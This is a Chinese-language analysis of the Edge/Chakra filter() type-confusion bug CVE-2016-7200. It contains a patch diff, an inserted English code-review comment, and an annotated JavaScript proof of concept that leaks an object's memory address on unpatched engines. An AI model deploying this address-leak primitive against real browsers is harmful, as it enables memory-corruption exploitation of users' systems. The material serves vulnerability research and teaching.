
Windows 10 x64 Edge CVE-2016-7200 & CVE-2016-7201漏洞分析及利用


1. 分析环境

操作系统:Windows 10 x64 专业版 10.0.14393 浏览器:Microsoft Edge x64 38.14393.0

2. CVE-2016-7200分析

这是发生在 JavascriptArray::FilterHelper 中、由类型混淆导致的漏洞:filter() 通过 ArraySpeciesCreate 创建结果对象,而该对象的构造函数可由脚本通过 Symbol.species 控制;快速路径却直接向拿到的对象写入元素。先看修复 commit(下面的 diff 摘自补丁,只截取了相关部分):

template <typename T> Var JavascriptArray::FilterHelper(JavascriptArray* pArr, RecyclableObject* obj, T length, Arguments& args, ScriptContext* scriptContext)
     { if (args.Info.Count < 2 || !JavascriptConversion::IsCallable(args[1]))
         {
             JavascriptError::ThrowTypeError(scriptContext, JSERR_FunctionArgument_NeedFunction, _u("Array.prototype.filter"));
         }
 
         RecyclableObject* callBackFn = RecyclableObject::FromVar(args[1]); Var thisArg = nullptr; if (args.Info.Count > 2)
         {
             thisArg = args[2];
         } else {
             thisArg = scriptContext->GetLibrary()->GetUndefined();
          } // If the source object is an Array exotic object we should try to load the constructor property and use it to construct the return object.
-        RecyclableObject* newObj = ArraySpeciesCreate(obj, 0, scriptContext);
 +        bool isBuiltinArrayCtor = true;
 +        RecyclableObject* newObj = ArraySpeciesCreate(obj, 0, scriptContext, nullptr, nullptr, &isBuiltinArrayCtor);
          JavascriptArray* newArr = nullptr; if (newObj == nullptr)
         {
             newArr = scriptContext->GetLibrary()->CreateArray(0);
             newArr->EnsureHead<Var>();
             newObj = newArr;
         } else { // If the new object we created is an array, remember that as it will save us time setting properties in the object below if (JavascriptArray::Is(newObj))
              {
 +#if ENABLE_COPYONACCESS_ARRAY
+                JavascriptLibrary::CheckAndConvertCopyOnAccessNativeIntArray<Var>(newObj);
 +#endif newArr = JavascriptArray::FromVar(newObj);
              }
          } Var element = nullptr; Var selected = nullptr; if (pArr)
         {
             Assert(length <= MaxArrayLength);
             uint32 i = 0; for (uint32 k = 0; k < length; k++)
             { if (!pArr->DirectGetItemAtFull(k, &element))
                 { continue;
                 }
 
                 selected = callBackFn->GetEntryPoint()(callBackFn, CallInfo(CallFlags_Value, 4), thisArg,
                     element,
                     JavascriptNumber::ToVar(k, scriptContext),
                     pArr); if (JavascriptConversion::ToBoolean(selected, scriptContext))
                   { // Try to fast path if the return object is an array
- if (newArr)
 + if (newArr && isBuiltinArrayCtor)
                      {
                          newArr->DirectSetItemAt(i, element);
                      }
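Review bot: The new `isBuiltinArrayCtor` guard on the fast path (`if (newArr && isBuiltinArrayCtor)`) is the whole fix, yet nothing at that site says why it is needed: `newArr` is still obtained via `JavascriptArray::FromVar(newObj)` after only a `JavascriptArray::Is(newObj)` check, and the added `CheckAndConvertCopyOnAccessNativeIntArray<Var>` call shows that non-Var array subtypes are expected to reach this point. Since `newObj` comes from `ArraySpeciesCreate`, i.e. from a constructor the script selects through `Symbol.species`, the PoC on this page presumably hands back a native-int array, and `DirectSetItemAt(i, element)` then stores a Var into element storage that is not Var-sized. I would comment the guard: `// Only take the direct-store fast path when ArraySpeciesCreate used the builtin Array ctor; a user species ctor can return any JavascriptArray subtype (e.g. native int) whose storage does not hold Vars.` The function and the loop's else branch continue beyond this excerpt, so whether the slow path also honours the flag cannot be checked here.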

再看下 PoC(在受影响的 Edge 版本上运行;它返回 [hi, lo],即读回的 x 对象地址的高、低 32 位):

// PoC for CVE-2016-7200 (Edge/Chakra JavascriptArray::FilterHelper).
// Array.prototype.filter builds its result through ArraySpeciesCreate, whose
// constructor is script-controlled; this PoC makes it hand back an existing
// array (`d`) so filter()'s fast path writes the kept elements straight into
// `d`, then reads those slots back as numbers.
// NOTE(review): only meaningful on an unpatched engine; on a spec-compliant
// engine filter() presumably just stores into `d` and this yields Number
// wrappers of 7 and NaN rather than an address.
var x = (new Array(56, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0)).slice(); /* x: the object whose address is read back (NOTE(review): the .slice() copy presumably matters for the array kind Chakra allocates - confirm) */ var [hi, lo] = PutDataAndGetAddr(x); function PutDataAndGetAddr(t) { var d = new Array(1,2,3); /* d: a plain 3-element array that filter() is tricked into writing into */ class dummy { constructor() { return d;
        }
    } /* dummy: a constructor that returns d instead of a new object */ class MyArray extends Array { static get [Symbol.species]() { return dummy;
        }
    } /* MyArray: exists only to supply dummy as Symbol.species */ var a = new Array({}, t, "theori", 7, 7, 7, 7, 7); /* t sits at index 1 of the source array */ function test(i) { return true;
    }

    a.__proto__ = MyArray.prototype; /* a.constructor now resolves to MyArray, so ArraySpeciesCreate picks dummy */ var o = a.filter(test); /* test() keeps every element */ var h = []; for (item in o) { /* NOTE: `item` has no var/let, so it leaks as a global */ var n = new Number(o[item]); if (n < 0) {
            n = n + 0x100000000; /* a negative int32 read back is normalised to its unsigned 32-bit value */
        }
        h.push(n);
    } return [h[3], h[2]]; /* NOTE(review): returning slots 3 and 2 as [hi, lo] suggests the 64-bit value stored for t (index 1) is read back as two 32-bit slots on the vulnerable engine - inferred, not shown here */
}

